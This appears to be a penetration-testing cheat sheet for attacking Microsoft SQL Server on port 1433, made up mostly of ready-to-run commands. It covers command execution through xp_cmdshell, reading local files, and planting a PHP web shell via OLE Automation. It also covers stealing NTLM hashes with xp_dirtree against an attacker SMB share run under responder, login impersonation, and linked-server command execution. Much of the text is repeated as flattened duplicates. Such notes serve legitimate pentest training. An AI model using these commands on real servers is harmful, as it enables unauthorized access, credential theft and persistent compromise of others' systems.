MSSQl - 1433

MSSQL default system schemas/databases:
- master - keeps the information for an instance of SQL Server.
- msdb - used by SQL Server Agent.
- model - a template database copied for each new database.
- resource - a read-only database that keeps system objects visible in every database on the server in sys schema.
- tempdb - keeps temporary objects for SQL queries.

Interacting with service

# Linux - SQSH
sqsh -S ip -U username -P Password123
sqsh -S ip -U .\\julio -P 'MyPassword!' -h

# Windows - SQLCMD
C:\> sqlcmd -S ip -U username -P Password123

# Useful Commands

# to list the databases
1> SELECT name FROM master.dbo.sysdatabases
2> GO

# Select a database
1> USE users
2> GO

# Show Tables
1> SELECT table_name FROM users.INFORMATION_SCHEMA.TABLES
2> GO

# Select all Data from Table "users"
1> SELECT * FROM users
2> go

# Execute Commands
1> xp_cmdshell 'whoami'
2> GO

# Read Local Files in MSSQL
1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO

# MSSQL - Enable Ole Automation Procedures
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO

# MSSQL - Create a File
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\\inetpub\\wwwroot\\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO

Nmap

# NMAP MSSQL Script Scan
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 ip

Metasploit

# MSSQL Ping in Metasploit using mssql_ping auxiliary scanner
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts ip
msf6 auxiliary(scanner/mssql/mssql_ping) > run

Capture MSSQL Service Hash

# Start responder or impacket-smbserver
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support

#  XP_DIRTREE Hash Stealing
1> EXEC master..xp_dirtree '\\\\10.10.110.17\\share\\'
2> GO

# XP_SUBDIRS Hash Stealing
1> EXEC master..xp_subdirs '\\\\10.10.110.17\\share\\'
2> GO

Impersonate Existing Users with MSSQL

# Identify Users that We Can Impersonate
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO

# Verifying our Current User and Role
# 0 means do not have sysadmin role
# 1 means we have sysadmin role
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go

# Impersonating the desired User
1> EXECUTE AS LOGIN = 'User'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO

Communicate with Other Databases with MSSQL

# 1 means remote server
# 0 means linked server
# Identify linked Servers in MSSQL
1> SELECT srvname, isremote FROM sysservers
2> GO

# Execute Commands using EXECUTE statement
# '10.0.0.12\\SQLEXPRESS' is a linked server 
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\\SQLEXPRESS]
2> GO

# finding mssqlclient.py
locate mssqlclient.py

/usr/bin/impacket-mssqlclient
/usr/share/doc/python3-impacket/examples/mssqlclient.py

# To Connect to mssql server with valid creds
python3 mssqlclient.py Administrator@ip -windows-auth

# Useful Commands : <https://www.sqlshack.com/working-sql-server-command-line-sqlcmd/>

# to list the databases
select name from sys.databases

PreviousMYSQL - 3306 NextFTP - 21

Last updated 2 years ago

# Linux - SQSH sqsh -S ip -U username -P Password123 sqsh -S ip -U .\\julio -P 'MyPassword!' -h # Windows - SQLCMD C:\> sqlcmd -S ip -U username -P Password123 # Useful Commands # to list the databases 1> SELECT name FROM master.dbo.sysdatabases 2> GO # Select a database 1> USE users 2> GO # Show Tables 1> SELECT table_name FROM users.INFORMATION_SCHEMA.TABLES 2> GO # Select all Data from Table "users" 1> SELECT * FROM users 2> go # Execute Commands 1> xp_cmdshell 'whoami' 2> GO # Read Local Files in MSSQL 1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents 2> GO # MSSQL - Enable Ole Automation Procedures 1> sp_configure 'show advanced options', 1 2> GO 3> RECONFIGURE 4> GO 5> sp_configure 'Ole Automation Procedures', 1 6> GO 7> RECONFIGURE 8> GO # MSSQL - Create a File 1> DECLARE @OLE INT 2> DECLARE @FileID INT 3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT 4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\\inetpub\\wwwroot\\webshell.php', 8, 1 5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>' 6> EXECUTE sp_OADestroy @FileID 7> EXECUTE sp_OADestroy @OLE 8> GO

# NMAP MSSQL Script Scan nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 ip

# Start responder or impacket-smbserver sudo responder -I tun0 sudo impacket-smbserver share ./ -smb2support # XP_DIRTREE Hash Stealing 1> EXEC master..xp_dirtree '\\\\10.10.110.17\\share\\' 2> GO # XP_SUBDIRS Hash Stealing 1> EXEC master..xp_subdirs '\\\\10.10.110.17\\share\\' 2> GO

# Identify Users that We Can Impersonate 1> SELECT distinct b.name 2> FROM sys.server_permissions a 3> INNER JOIN sys.server_principals b 4> ON a.grantor_principal_id = b.principal_id 5> WHERE a.permission_name = 'IMPERSONATE' 6> GO # Verifying our Current User and Role # 0 means do not have sysadmin role # 1 means we have sysadmin role 1> SELECT SYSTEM_USER 2> SELECT IS_SRVROLEMEMBER('sysadmin') 3> go # Impersonating the desired User 1> EXECUTE AS LOGIN = 'User' 2> SELECT SYSTEM_USER 3> SELECT IS_SRVROLEMEMBER('sysadmin') 4> GO

# 1 means remote server # 0 means linked server # Identify linked Servers in MSSQL 1> SELECT srvname, isremote FROM sysservers 2> GO # Execute Commands using EXECUTE statement # '10.0.0.12\\SQLEXPRESS' is a linked server 1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\\SQLEXPRESS] 2> GO

# finding mssqlclient.py locate mssqlclient.py /usr/bin/impacket-mssqlclient /usr/share/doc/python3-impacket/examples/mssqlclient.py # To Connect to mssql server with valid creds python3 mssqlclient.py Administrator@ip -windows-auth # Useful Commands : <https://www.sqlshack.com/working-sql-server-command-line-sqlcmd/> # to list the databases select name from sys.databases

MSSQl - 1433

Interacting with service

Nmap

Metasploit

Capture MSSQL Service Hash

Impersonate Existing Users with MSSQL

Communicate with Other Databases with MSSQL

MSSQl - 1433

Interacting with service

Nmap

Metasploit

Capture MSSQL Service Hash

Impersonate Existing Users with MSSQL

Communicate with Other Databases with MSSQL

Connecting with

Connecting with